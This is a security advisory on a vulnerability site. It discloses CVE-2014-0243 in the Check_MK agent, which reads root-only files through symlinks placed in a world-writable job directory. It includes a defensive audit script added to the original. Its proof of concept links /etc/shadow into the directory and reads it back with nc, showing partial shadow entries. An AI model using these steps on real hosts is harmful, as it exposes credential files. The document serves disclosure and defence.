Securityvulns SECURITYVULNS:DOC:30760
May 29, 2014 - 12:00 a.m.

LSE Leading Security Experts GmbH - LSE-2014-05-21 - Check_MK - Arbitrary File Disclosure Vulnerability

vulners.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-05-21 ===

Check_MK - Arbitrary File Disclosure Vulnerability


Affected Versions

Linux versions of Check_MK starting with commit
7e9088c09963cb2e76030e8b645607692ec56011 until Release v1.2.5i2p1.

Other platforms are not affected as the vulnerable feature is not
implemented there.

Issue Overview

Technical Risk: high
Likelihood of Exploitation: high
Vendor: Mathias Kettner GmbH
Credits: LSE Leading Security Experts GmbH employees
Markus Vervier and Sascha Kettler
Advisory URL: https://www.lsexperts.de/advisories/lse-2014-05-21.txt
Advisory Status: Public
CVE-Number: CVE-2014-0243

Issue Description

While conducting a whitebox test, LSE Leading Security Experts GmbH
discovered that the Check_MK agent processes files from a directory
with mode 1777. The agent does not check whether these files are
symbolic or hard filesystem links.

As the Check_MK agent runs with root permissions by default, it will
read arbitrary files and readable devices with root permissions.

The directory mode 1777 was introduced on Sep 5 15:49:46 2013 +0200
in commit 7e9088c09963cb2e76030e8b645607692ec56011:

<<>>
commit 7e9088c09963cb2e76030e8b645607692ec56011
Author: Bernd Stroessenreuther <[email protected]>
Date: Thu Sep 5 15:49:46 2013 +0200

mk-job: /var/lib/check_mk_agent/job directory is now
created with mode 1777 so mk-job can be used by
unprivileged users too: fixing bug #1040

<<>>

The vulnerable code in the agent for reading job results from
"/var/lib/check_mk_agent/job" is:

<<>>

# Get statistics about monitored jobs
if cd /var/lib/check_mk_agent/job; then
    echo '<<<job>>>'
    head -n -0 -v *
fi
<<>>

Impact

A local user may create a symbolic link in the directory
"/var/lib/check_mk_agent/job" pointing to a file he would not normally
have access to, such as "/etc/shadow". The agent expects output from
jobs using the mk-job tool in that directory. It will output the
content of all files in the directory on TCP port 6556 by default.

Temporary Workaround and Fix

LSE Leading Security Experts GmbH advises temporarily removing the
write permissions and the sticky bit for non-root users by setting
mode 755 on the directory.
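
One way to check a host for the condition described above, as an added
example that is not part of the advisory and not Check_MK code. The helper
name audit_job_dir is hypothetical, and a Linux stat supporting -c is assumed.

```shell
#!/bin/sh
# Added example, not Check_MK code. audit_job_dir is a hypothetical helper.
# Assumes Linux with a stat that supports -c (GNU coreutils or busybox).
# Usage: audit_job_dir /var/lib/check_mk_agent/job

audit_job_dir() {
    dir=$1
    findings=0
    [ -d "$dir" ] || { echo "ERROR $dir is not a directory"; return 2; }

    # Directory mode: group- or other-writable (1777 in the advisory) lets
    # unprivileged users create entries that a root process later reads.
    mode=$(stat -c '%a' "$dir")
    if [ $(( (mode / 10 % 10) & 2 )) -ne 0 ] || [ $(( (mode % 10) & 2 )) -ne 0 ]; then
        echo "MODE $mode group/other-writable"
        findings=$((findings + 1))
    fi

    # Same glob the agent uses (*), so dotfiles are skipped here as well.
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue      # unmatched glob
        name=${f##*/}
        if [ -L "$f" ]; then                        # includes dangling links
            echo "SYMLINK $name -> $(readlink "$f")"
        elif [ ! -f "$f" ]; then                    # device, FIFO, socket, dir
            echo "SPECIAL $name"
        elif [ "$(stat -c '%h' "$f")" -gt 1 ]; then # extra hard links
            echo "HARDLINK $name links=$(stat -c '%h' "$f")"
        else
            continue                                # plain job result file
        fi
        findings=$((findings + 1))
    done

    # Exit status 0 = nothing to report, 1 = at least one finding.
    [ "$findings" -eq 0 ]
}
```

The check is a point-in-time audit: in a directory that is still writable
by other users, entries can change between the audit and the agent's read.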

Proof of Concept

[myhost]$ pwd
/var/lib/check_mk_agent/job
[myhost]$ ls -l
total 0
[myhost]$ ln -s /etc/shadow
[myhost]$ ls -la
total 4
drwxrwxrwt 2 root   root    4096 May 21 15:17 .
drwxr-xr-x 3 root   root    4096 Feb 26 13:54 ..
lrwxrwxrwx 1 myuser mygroup   11 May 21 15:17 shadow -> /etc/shadow
[myhost]$ nc 127.0.0.1 6556
[...]
<<<job>>>
==> shadow <==
root:$6$[...]:16133:0:99999:7:::
bin:*:15937:0:99999:7:::
daemon:*:15937:0:99999:7:::
adm:*:15937:0:99999:7:::
lp:*:15937:0:99999:7:::
sync:*:15937:0:99999:7:::
shutdown:*:15937:0:99999:7:::
halt:*:15937:0:99999:7:::
mail:*:15937:0:99999:7:::
uucp:*:15937:0:99999:7:::
operator:*:15937:0:99999:7:::
games:*:15937:0:99999:7:::
gopher:*:15937:0:99999:7:::
ftp:*:15937:0:99999:7:::
nobody:*:15937:0:99999:7:::
[...]

History

2014-05-20 Issue discovery
2014-05-21 Permission of customer for advisory
2014-05-21 Vendor informed
2014-05-22 CVE requested
2014-05-22 Vendor response
2014-05-22 CVE-2014-0243 assigned
2014-05-26 Official fix available
2014-05-27 Advisory release


http://www.lsexperts.de
LSE Leading Security Experts GmbH, P.O. Box 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Registered office: Weiterstadt, Darmstadt District Court: HRB8649
Managing directors: Oliver Michel, Sven Walther
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (FreeBSD)

-----END PGP SIGNATURE-----